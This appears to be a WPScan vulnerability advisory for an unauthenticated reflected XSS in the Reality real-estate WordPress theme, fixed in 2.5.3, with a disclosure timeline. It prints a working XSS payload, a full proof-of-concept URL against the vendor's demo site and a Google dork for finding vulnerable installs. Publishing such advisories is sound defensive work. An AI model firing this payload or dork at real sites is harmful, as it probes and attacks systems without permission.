Themes Vulnerabilities
Reality < 2.5.3 - Unauthenticated Reflected XSS
Description
Reflected XSS was discovered in the «Reality | Estate Multipurpose WordPress Theme», tested version — v2.5.1
Edit (WPScanTeam):
January 16th, 2020 - Report Received & Envato Contacted
January 17th, 2020 - Envato Investigating
February 6th, 2020 - Envato Contacted Again for Updates
February 7th, 2020 - Author is not responding to Envato, theme has been disabled on the Marketplace. Disclosing the issue.
March, 18th, 2020 - v2.5.3 released
Proof of Concept
----[]- Info: -[]---- Demo website: http://reality.inwavethemes.com/ Google Dork: /wp-content/themes/reality/ ----[]- Reflected XSS: -[]---- Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//"> PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=
Affects Themes
Fixed in 2.5.3 References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-01-16 (about 4 years ago)
Added
2020-02-07 (about 4 years ago)
Last Updated
2020-07-29 (about 3 years ago)
WPScan 